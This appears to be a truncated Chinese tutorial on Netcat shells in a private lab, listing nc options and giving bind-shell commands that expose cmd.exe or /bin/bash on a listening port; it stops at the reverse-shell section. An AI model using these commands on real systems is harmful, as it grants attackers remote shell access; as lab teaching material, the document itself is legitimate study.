内网隧道代理技术之 Netcat反弹Shell

Netcat反弹ShellNetcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军&刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下：参数作用-c指定连接后要执行的shell命令-e指定连接后要执行的文件名-k配置 Socket一直存活(若不想退出 Shell后使监听断开可使用此参数)-l监听模式-p设置本地主机使用的通信端口-u使用UDP传输协议,默认为TCP-v显示指令执行过程,用-vv会更详细一、正向反弹Shell实验拓扑机器名称IP攻击机器192.168.41.20服务器192.168.41.130实验介绍攻击者机器192.168.41.20 和服务器 192.168.41.130 可以相互的访问，这个时候可以使用正向shell实验复现1）在服务器上运行：#windows机器nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe #linux机器nc -lvvp 1111 -e /bin/bash3）拿到正向的shell二、反向反弹Shell实验拓扑机器名称IP攻击机器192.168.41.20服务器 ………………………………